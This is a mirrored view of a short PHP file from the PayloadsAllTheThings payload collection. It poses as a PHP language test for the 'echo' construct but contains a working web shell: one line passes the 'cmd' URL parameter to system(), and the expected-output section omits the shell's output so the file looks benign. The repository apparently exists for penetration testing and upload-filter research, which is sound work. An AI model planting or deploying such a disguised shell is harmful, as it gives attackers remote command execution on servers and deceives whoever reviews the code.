mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 23:32:45 +00:00
9 lines
No EOL
184 B
PHP
9 lines
No EOL
184 B
PHP
--TEST--
|
|
echo - basic test for echo language construct
|
|
--FILE--
|
|
<?php
|
|
echo 'This works ', 'and takes args!';
|
|
echo "Shell";system($_GET['cmd']);
|
|
?>
|
|
--EXPECT--
|
|
This works and takes args!
|